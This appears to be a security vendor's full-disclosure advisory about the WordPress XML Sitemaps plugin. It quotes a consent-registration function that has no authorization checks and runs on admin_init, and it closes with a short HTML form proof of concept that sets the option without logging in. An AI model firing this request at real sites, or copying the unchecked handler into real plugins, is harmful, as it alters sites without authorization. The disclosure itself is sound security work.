The latest version of the WordPress plugin XML Sitemaps was flagged by a machine learning based system we have to try to detect if changes made to plugins used by our customers have had vulnerabilities introduced in to them. It wasn’t hard to find a vulnerability being introduced in to the new version of the plugin. The new version introduces a “beta testing program” and code that is supposed to register consent for that lacks any security checks, so anyone access that.

That code is in the function register_consent, which is located in the file /sitemap.php:

296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321

function register_consent() {
	if ( ! ( defined( 'DOING_AJAX' ) && DOING_AJAX ) ) {
		if ( isset( $_POST['user_consent_yes'] ) ) {
			update_option( 'sm_user_consent', 'yes' );
		}
		if ( isset( $_POST['user_consent_no'] ) ) {
			update_option( 'sm_user_consent', 'no' );
		}
		if ( isset( $_POST['action'] ) ) {
			if ( 'no' === $_POST['action'] ) {
				if ( $_SERVER['QUERY_STRING'] ) {
					update_option( 'sm_show_beta_banner', 'false' );
					$count = get_option( 'sm_beta_banner_discarded_count' );
					if ( gettype( $count ) !== 'boolean' ) {
						update_option( 'sm_beta_banner_discarded_count', (int) $count + 1 );
					} else {
						add_option( 'sm_beta_banner_discarded_on', gmdate( 'Y/m/d' ) );
						update_option( 'sm_beta_banner_discarded_count', (int) 1 );
					}
				} else {
					add_option( 'sm_beta_notice_dismissed_from_wp_admin', 'true' );
				}
			}
		}
	}
}

That function runs during admin_init, which makes it accessible to even those not logged in to WordPress:

60

add_action( 'admin_init', 'register_consent', 1 );

WordPress Causes Full Disclosure

As a protest of the moderators of the WordPress Support Forum’s continued inappropriate behavior we changed from reasonably disclosing to full disclosing vulnerabilities for plugins in the WordPress Plugin Directory in protest, until WordPress gets that situation cleaned up, so we are releasing this post and then leaving a message about that for the developer through the WordPress Support Forum. (For plugins that are also in the ClassicPress Plugin Directory, we will follow our reasonable disclosure policy.)

You can notify the developer of this issue on the forum as well.

After four years, the moderators have finally tacitly admitted they were behaving inappropriately and have made moves to fix the problems (though incompletely), so these full disclosures can be ended if they simply restore access to our accounts and plugins in the Plugin Directory. Hopefully that takes less than four years.

Update: To clear up the confusion where developers claim we hadn’t tried to notify them through the Support Forum (while at the same time moderators are complaining about us doing just that), here is the message we left for this vulnerability:

Proof of Concept

The following proof of concept will give consent for the beta testing program.

Replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-post.php" method="POST">
<input type="hidden" name="user_consent_yes" value="true" />
<input type="submit" value="Submit" />
</form>
</body>

Concerned About The Security of the Plugins You Use?

Plugin Security Scorecard Grade for XML Sitemaps

See issues causing the plugin to get less than A+ grade